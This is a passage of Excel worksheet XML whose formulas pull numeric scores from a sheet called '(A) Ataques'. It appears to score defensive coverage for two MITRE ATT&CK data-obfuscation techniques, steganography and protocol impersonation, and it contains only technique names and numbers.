    <col min="31" max="32" width="9.140625" style="1" customWidth="1"/>
    <col min="33" max="33" width="6.5703125" style="1" customWidth="1"/>
    <col min="34" max="34" width="9.42578125" style="1" customWidth="1"/>
    <col min="35" max="35" width="8.5703125" style="1" customWidth="1"/>
    <col min="36" max="36" width="7.5703125" style="5" customWidth="1"/>
    <col min="37" max="37" width="9.28515625" style="5" customWidth="1"/>
    <col min="38" max="39" width="6.5703125" style="5" customWidth="1"/>
    <col min="40" max="40" width="8.5703125" style="5" customWidth="1"/>
    <col min="41" max="41" width="7.5703125" style="1" customWidth="1"/>
    <col min="42" max="42" width="9.7109375" style="1" customWidth="1"/>
    <col min="43" max="44" width="6.5703125" style="1" customWidth="1"/>
    <col min="45" max="45" width="8.5703125" style="1" customWidth="1"/>
    <col min="46" max="46" width="7.5703125" style="1" customWidth="1"/>
    <col min="47" max="47" width="9" style="1" customWidth="1"/>
    <col min="48" max="49" width="6.5703125" style="1" customWidth="1"/>
    <col min="50" max="50" width="8.5703125" style="1" customWidth="1"/>
    <col min="51" max="51" width="7.42578125" style="2" customWidth="1"/>
    <col min="52" max="52" width="9.7109375" style="2" customWidth="1"/>
    <col min="53" max="53" width="8.42578125" style="2" customWidth="1"/>
    <col min="54" max="54" width="5.85546875" style="2" customWidth="1"/>
    <col min="55" max="55" width="9" style="2" customWidth="1"/>
    <col min="56" max="56" width="8.42578125" style="2" customWidth="1"/>
    <col min="57" max="57" width="9.5703125" style="2" customWidth="1"/>
    <col min="58" max="58" width="8.42578125" style="2" customWidth="1"/>
    <col min="59" max="59" width="5.85546875" style="2" customWidth="1"/>
    <col min="60" max="60" width="7.7109375" style="2" customWidth="1"/>
    <col min="61" max="61" width="9" style="2" customWidth="1"/>
    <col min="62" max="62" width="7.28515625" style="2" customWidth="1"/>
    <col min="63" max="63" width="9.5703125" style="2" customWidth="1"/>
    <col min="64" max="64" width="8.7109375" style="2" customWidth="1"/>
    <col min="65" max="65" width="8.140625" style="2" customWidth="1"/>
    <col min="66" max="66" width="9.140625" style="2" customWidth="1"/>
    <col min="67" max="67" width="8.7109375" style="2" customWidth="1"/>
    <col min="68" max="68" width="9.85546875" style="2" customWidth="1"/>
    <col min="69" max="69" width="8.7109375" style="2" customWidth="1"/>
    <col min="70" max="70" width="6.7109375" style="2" customWidth="1"/>
    <col min="71" max="71" width="8.28515625" style="2" customWidth="1"/>
    <col min="72" max="72" width="9.140625" style="2" customWidth="1"/>
    <col min="73" max="182" width="29.140625" style="8" customWidth="1"/>
    <col min="183" max="16384" width="12.5703125" style="8"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:72" s="1" customFormat="1" ht="31.7" customHeight="1" thickBot="1">
      <c r="A1" s="663" t="s">
        <v>177</v>
      </c>
      <c r="B1" s="663" t="s">
        <v>282</v>
      </c>
      <c r="C1" s="663" t="s">
        <v>283</v>
      </c>
      <c r="D1" s="663" t="s">
        <v>285</v>
      </c>
      <c r="E1" s="668" t="s">
        <v>286</v>
      </c>
      <c r="F1" s="739" t="s">
        <v>2312</v>
      </c>
      <c r="G1" s="740"/>
      <c r="H1" s="740"/>
      <c r="I1" s="740"/>
      <c r="J1" s="741"/>
      <c r="K1" s="739" t="s">
        <v>2313</v>
      </c>
      <c r="L1" s="740"/>
      <c r="M1" s="740"/>
      <c r="N1" s="740"/>
      <c r="O1" s="741"/>
      <c r="P1" s="739" t="s">
        <v>2314</v>
      </c>
      <c r="Q1" s="740"/>
      <c r="R1" s="740"/>
      <c r="S1" s="740"/>
      <c r="T1" s="741"/>
      <c r="U1" s="739" t="s">
        <v>2315</v>
      </c>
      <c r="V1" s="740"/>
      <c r="W1" s="740"/>
      <c r="X1" s="740"/>
      <c r="Y1" s="741"/>
      <c r="Z1" s="739" t="s">
        <v>2316</v>
      </c>
      <c r="AA1" s="740"/>
      <c r="AB1" s="740"/>
      <c r="AC1" s="740"/>
      <c r="AD1" s="741"/>
      <c r="AE1" s="739" t="s">
        <v>2317</v>
      </c>
      <c r="AF1" s="740"/>
      <c r="AG1" s="740"/>
      <c r="AH1" s="740"/>
      <c r="AI1" s="741"/>
      <c r="AJ1" s="739" t="s">
        <v>2318</v>
      </c>
      <c r="AK1" s="740"/>
      <c r="AL1" s="740"/>
      <c r="AM1" s="740"/>
      <c r="AN1" s="741"/>
      <c r="AO1" s="739" t="s">
        <v>2319</v>
      </c>
      <c r="AP1" s="740"/>
      <c r="AQ1" s="740"/>
      <c r="AR1" s="740"/>
      <c r="AS1" s="741"/>
      <c r="AT1" s="739" t="s">
        <v>2320</v>
      </c>
      <c r="AU1" s="740"/>
      <c r="AV1" s="740"/>
      <c r="AW1" s="740"/>
      <c r="AX1" s="741"/>
      <c r="AY1" s="744" t="s">
        <v>2429</v>
      </c>
      <c r="AZ1" s="745"/>
      <c r="BA1" s="745"/>
      <c r="BB1" s="745"/>
      <c r="BC1" s="745"/>
      <c r="BD1" s="744" t="s">
        <v>2479</v>
      </c>
      <c r="BE1" s="745"/>
      <c r="BF1" s="745"/>
      <c r="BG1" s="745"/>
      <c r="BH1" s="745"/>
      <c r="BI1" s="745"/>
      <c r="BJ1" s="746" t="s">
        <v>2430</v>
      </c>
      <c r="BK1" s="747"/>
      <c r="BL1" s="747"/>
      <c r="BM1" s="747"/>
      <c r="BN1" s="748"/>
      <c r="BO1" s="746" t="s">
        <v>2444</v>
      </c>
      <c r="BP1" s="747"/>
      <c r="BQ1" s="747"/>
      <c r="BR1" s="747"/>
      <c r="BS1" s="747"/>
      <c r="BT1" s="748"/>
    </row>
    <row r="2" spans="1:72" s="3" customFormat="1" ht="56.25" customHeight="1" thickBot="1">
      <c r="A2" s="664"/>
      <c r="B2" s="664"/>
      <c r="C2" s="664"/>
      <c r="D2" s="664"/>
      <c r="E2" s="669"/>
      <c r="F2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="G2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="H2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="I2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="J2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="K2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="L2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="M2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="N2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="O2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="P2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="Q2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="R2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="S2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="T2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="U2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="V2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="W2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="X2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="Y2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="Z2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="AA2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="AB2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="AC2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="AD2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="AE2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="AF2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="AG2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="AH2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="AI2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="AJ2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="AK2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="AL2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="AM2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="AN2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="AO2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="AP2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="AQ2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="AR2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="AS2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="AT2" s="401" t="s">
        <v>293</v>
      </c>
      <c r="AU2" s="508" t="s">
        <v>4457</v>
      </c>
      <c r="AV2" s="325" t="s">
        <v>725</v>
      </c>
      <c r="AW2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="AX2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="AY2" s="466" t="s">
        <v>293</v>
      </c>
      <c r="AZ2" s="509" t="s">
        <v>4457</v>
      </c>
      <c r="BA2" s="467" t="s">
        <v>729</v>
      </c>
      <c r="BB2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="BC2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="BD2" s="466" t="s">
        <v>293</v>
      </c>
      <c r="BE2" s="509" t="s">
        <v>4457</v>
      </c>
      <c r="BF2" s="467" t="s">
        <v>729</v>
      </c>
      <c r="BG2" s="468" t="s">
        <v>730</v>
      </c>
      <c r="BH2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="BI2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="BJ2" s="466" t="s">
        <v>293</v>
      </c>
      <c r="BK2" s="509" t="s">
        <v>4457</v>
      </c>
      <c r="BL2" s="467" t="s">
        <v>736</v>
      </c>
      <c r="BM2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="BN2" s="402" t="s">
        <v>289</v>
      </c>
      <c r="BO2" s="466" t="s">
        <v>293</v>
      </c>
      <c r="BP2" s="509" t="s">
        <v>4457</v>
      </c>
      <c r="BQ2" s="467" t="s">
        <v>736</v>
      </c>
      <c r="BR2" s="468" t="s">
        <v>730</v>
      </c>
      <c r="BS2" s="494" t="s">
        <v>4131</v>
      </c>
      <c r="BT2" s="402" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="3" spans="1:72" ht="15" customHeight="1" thickBot="1">
      <c r="A3" s="79">
        <v>1</v>
      </c>
      <c r="B3" s="4">
        <f>IF('(A) Ataques'!AK3&lt;&gt;"NO",'(A) Ataques'!E3,"")</f>
        <v>1</v>
      </c>
      <c r="C3" s="6" t="str">
        <f>IF('(A) Ataques'!AK3&lt;&gt;"NO",IF('(A) Ataques'!M3="","",'(A) Ataques'!M3),"")</f>
        <v>T1001.002-Data_obfuscation_steganography</v>
      </c>
      <c r="D3" s="4" t="str">
        <f>IF('(A) Ataques'!AK3&lt;&gt;"NO",'(A) Ataques'!F3,"")</f>
        <v>T1001</v>
      </c>
      <c r="E3" s="286">
        <f>IF('(A) Ataques'!AK3&lt;&gt;"NO",'(A) Ataques'!AQ3,"")</f>
        <v>1</v>
      </c>
      <c r="F3" s="288">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!BB3,"")</f>
        <v>6</v>
      </c>
      <c r="G3" s="392">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!BD3,"")</f>
        <v>3</v>
      </c>
      <c r="H3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!BF3,"")</f>
        <v>3</v>
      </c>
      <c r="I3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!BG3,"")</f>
        <v>1</v>
      </c>
      <c r="J3" s="530">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($F3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BH3,"")</f>
        <v>0</v>
      </c>
      <c r="L3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BJ3,"")</f>
        <v>0</v>
      </c>
      <c r="M3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BL3,"")</f>
        <v>0</v>
      </c>
      <c r="N3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BM3,"")</f>
        <v>0</v>
      </c>
      <c r="O3" s="532">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($K3=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P3" s="292">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BN3,"")</f>
        <v>6</v>
      </c>
      <c r="Q3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BP3,"")</f>
        <v>3</v>
      </c>
      <c r="R3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BR3,"")</f>
        <v>3</v>
      </c>
      <c r="S3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BS3,"")</f>
        <v>1</v>
      </c>
      <c r="T3" s="530">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($P3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BT3,"")</f>
        <v>6</v>
      </c>
      <c r="V3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BV3,"")</f>
        <v>3</v>
      </c>
      <c r="W3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BX3,"")</f>
        <v>3</v>
      </c>
      <c r="X3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$BY3,"")</f>
        <v>1</v>
      </c>
      <c r="Y3" s="532">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($U3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z3" s="288">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!BZ3,"")</f>
        <v>4</v>
      </c>
      <c r="AA3" s="392">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!CB3,"")</f>
        <v>2</v>
      </c>
      <c r="AB3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!CD3,"")</f>
        <v>2</v>
      </c>
      <c r="AC3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!CE3,"")</f>
        <v>1</v>
      </c>
      <c r="AD3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF(Z3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CF3,"")</f>
        <v>10</v>
      </c>
      <c r="AF3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CH3,"")</f>
        <v>5</v>
      </c>
      <c r="AG3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CJ3,"")</f>
        <v>5</v>
      </c>
      <c r="AH3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CK3,"")</f>
        <v>1</v>
      </c>
      <c r="AI3" s="287">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($AE3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ3" s="292">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CL3,"")</f>
        <v>0</v>
      </c>
      <c r="AK3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CN3,"")</f>
        <v>0</v>
      </c>
      <c r="AL3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CP3,"")</f>
        <v>0</v>
      </c>
      <c r="AM3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CQ3,"")</f>
        <v>0</v>
      </c>
      <c r="AN3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($AJ3=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CR3,"")</f>
        <v>0</v>
      </c>
      <c r="AP3" s="322">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CT3,"")</f>
        <v>0</v>
      </c>
      <c r="AQ3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CV3,"")</f>
        <v>0</v>
      </c>
      <c r="AR3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!$CW3,"")</f>
        <v>0</v>
      </c>
      <c r="AS3" s="287">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($AO3=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT3" s="288">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!CX3,"")</f>
        <v>6</v>
      </c>
      <c r="AU3" s="392">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!CZ3,"")</f>
        <v>3</v>
      </c>
      <c r="AV3" s="4">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!DB3,"")</f>
        <v>3</v>
      </c>
      <c r="AW3" s="20">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",'(A) Ataques'!DC3,"")</f>
        <v>1</v>
      </c>
      <c r="AX3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($AT3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY3" s="469">
        <f>'(A) Ataques'!LU3+'(A) Ataques'!MA3+'(A) Ataques'!MG3+'(A) Ataques'!MM3+'(A) Ataques'!MS3</f>
        <v>1</v>
      </c>
      <c r="AZ3" s="510">
        <f>'(A) Ataques'!LW3+'(A) Ataques'!MC3+'(A) Ataques'!MI3+'(A) Ataques'!MO3+'(A) Ataques'!MU3</f>
        <v>1</v>
      </c>
      <c r="BA3" s="471">
        <f>'(A) Ataques'!LY3+'(A) Ataques'!ME3+'(A) Ataques'!MK3+'(A) Ataques'!MQ3+'(A) Ataques'!MW3</f>
        <v>1</v>
      </c>
      <c r="BB3" s="471">
        <f>'(A) Ataques'!LQ3</f>
        <v>1</v>
      </c>
      <c r="BC3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($AY3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD3" s="469">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!LL3,"")</f>
        <v>2</v>
      </c>
      <c r="BE3" s="510">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!LM3,"")</f>
        <v>2</v>
      </c>
      <c r="BF3" s="471">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!LN3,"")</f>
        <v>1</v>
      </c>
      <c r="BG3" s="471">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!LO3,"")</f>
        <v>1</v>
      </c>
      <c r="BH3" s="471">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!LS3,"")</f>
        <v>1</v>
      </c>
      <c r="BI3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($BD3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ3" s="469">
        <f>'(A) Ataques'!OL3+'(A) Ataques'!OR3+'(A) Ataques'!OX3+'(A) Ataques'!PD3+'(A) Ataques'!PJ3</f>
        <v>1</v>
      </c>
      <c r="BK3" s="510">
        <f>'(A) Ataques'!ON3+'(A) Ataques'!OT3+'(A) Ataques'!OZ3+'(A) Ataques'!PF3+'(A) Ataques'!PL3</f>
        <v>1</v>
      </c>
      <c r="BL3" s="471">
        <f>'(A) Ataques'!OP3+'(A) Ataques'!OV3+'(A) Ataques'!PB3+'(A) Ataques'!PH3+'(A) Ataques'!PN3</f>
        <v>1</v>
      </c>
      <c r="BM3" s="495">
        <f>'(A) Ataques'!OH3</f>
        <v>1</v>
      </c>
      <c r="BN3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($BJ3=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO3" s="469">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!OC3,"")</f>
        <v>1</v>
      </c>
      <c r="BP3" s="510">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!OD3,"")</f>
        <v>1</v>
      </c>
      <c r="BQ3" s="471">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!OE3,"")</f>
        <v>1</v>
      </c>
      <c r="BR3" s="471">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!OF3,"")</f>
        <v>1</v>
      </c>
      <c r="BS3" s="471">
        <f>IF('(A) Ataques'!$AP3&lt;&gt;"NO",'(A) Ataques'!OJ3,"")</f>
        <v>1</v>
      </c>
      <c r="BT3" s="331">
        <f>IF('(A) Ataques'!$AK3&lt;&gt;"NO",IF($BO3=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A4" s="79">
        <f>A3+1</f>
        <v>2</v>
      </c>
      <c r="B4" s="4">
        <f>IF('(A) Ataques'!AK4&lt;&gt;"NO",'(A) Ataques'!E4,"")</f>
        <v>1</v>
      </c>
      <c r="C4" s="6" t="str">
        <f>IF('(A) Ataques'!AK4&lt;&gt;"NO",IF('(A) Ataques'!M4="","",'(A) Ataques'!M4),"")</f>
        <v>T1001.003-Data_obfuscation_protocol_impersonation</v>
      </c>
      <c r="D4" s="4" t="str">
        <f>IF('(A) Ataques'!AK4&lt;&gt;"NO",'(A) Ataques'!F4,"")</f>
        <v>T1001</v>
      </c>
      <c r="E4" s="286">
        <f>IF('(A) Ataques'!AK4&lt;&gt;"NO",'(A) Ataques'!AQ4,"")</f>
        <v>1</v>
      </c>
      <c r="F4" s="288">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!BB4,"")</f>
        <v>3</v>
      </c>
      <c r="G4" s="392">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!BD4,"")</f>
        <v>3</v>
      </c>
      <c r="H4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!BF4,"")</f>
        <v>3</v>
      </c>
      <c r="I4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!BG4,"")</f>
        <v>1</v>
      </c>
      <c r="J4" s="530">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($F4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BH4,"")</f>
        <v>0</v>
      </c>
      <c r="L4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BJ4,"")</f>
        <v>0</v>
      </c>
      <c r="M4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BL4,"")</f>
        <v>0</v>
      </c>
      <c r="N4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BM4,"")</f>
        <v>0</v>
      </c>
      <c r="O4" s="532">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($K4=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P4" s="292">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BN4,"")</f>
        <v>3</v>
      </c>
      <c r="Q4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BP4,"")</f>
        <v>3</v>
      </c>
      <c r="R4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BR4,"")</f>
        <v>3</v>
      </c>
      <c r="S4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BS4,"")</f>
        <v>1</v>
      </c>
      <c r="T4" s="530">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($P4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BT4,"")</f>
        <v>3</v>
      </c>
      <c r="V4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BV4,"")</f>
        <v>3</v>
      </c>
      <c r="W4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BX4,"")</f>
        <v>3</v>
      </c>
      <c r="X4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$BY4,"")</f>
        <v>1</v>
      </c>
      <c r="Y4" s="532">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($U4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z4" s="288">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!BZ4,"")</f>
        <v>4</v>
      </c>
      <c r="AA4" s="392">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!CB4,"")</f>
        <v>2</v>
      </c>
      <c r="AB4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!CD4,"")</f>
        <v>2</v>
      </c>
      <c r="AC4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!CE4,"")</f>
        <v>1</v>
      </c>
      <c r="AD4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF(Z4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CF4,"")</f>
        <v>7</v>
      </c>
      <c r="AF4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CH4,"")</f>
        <v>5</v>
      </c>
      <c r="AG4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CJ4,"")</f>
        <v>5</v>
      </c>
      <c r="AH4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CK4,"")</f>
        <v>1</v>
      </c>
      <c r="AI4" s="287">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($AE4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ4" s="292">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CL4,"")</f>
        <v>0</v>
      </c>
      <c r="AK4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CN4,"")</f>
        <v>0</v>
      </c>
      <c r="AL4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CP4,"")</f>
        <v>0</v>
      </c>
      <c r="AM4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CQ4,"")</f>
        <v>0</v>
      </c>
      <c r="AN4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($AJ4=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CR4,"")</f>
        <v>0</v>
      </c>
      <c r="AP4" s="322">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CT4,"")</f>
        <v>0</v>
      </c>
      <c r="AQ4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CV4,"")</f>
        <v>0</v>
      </c>
      <c r="AR4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!$CW4,"")</f>
        <v>0</v>
      </c>
      <c r="AS4" s="287">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($AO4=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT4" s="288">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!CX4,"")</f>
        <v>3</v>
      </c>
      <c r="AU4" s="392">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!CZ4,"")</f>
        <v>3</v>
      </c>
      <c r="AV4" s="4">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!DB4,"")</f>
        <v>3</v>
      </c>
      <c r="AW4" s="20">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",'(A) Ataques'!DC4,"")</f>
        <v>1</v>
      </c>
      <c r="AX4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($AT4=0,0,1),"")</f>
        <v>1</v>
      </c>
